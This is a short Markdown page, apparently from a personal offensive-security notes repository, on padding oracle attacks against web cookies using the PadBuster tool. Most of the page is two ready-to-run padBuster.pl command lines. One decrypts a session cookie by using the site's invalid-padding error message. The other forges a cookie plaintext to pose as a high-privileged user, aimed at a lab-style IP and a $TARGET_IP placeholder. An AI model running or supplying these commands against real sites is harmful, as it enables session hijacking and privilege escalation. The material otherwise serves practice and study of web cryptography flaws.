whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Exploits/Web/Padding Oracle.md

622 B
Raw Blame History

PadBuster

Usage on Cookies

  • Oracle on cookievalue, use website error message of invalid padding
  • A high privileged user account can be added as a target
 ./padBuster.pl http://10.10.135.100/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "hcon=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>"
```sh
 ./padBuster.pl http://$TARGET_IP/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "session=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>" -plaintext '<user>=<username>'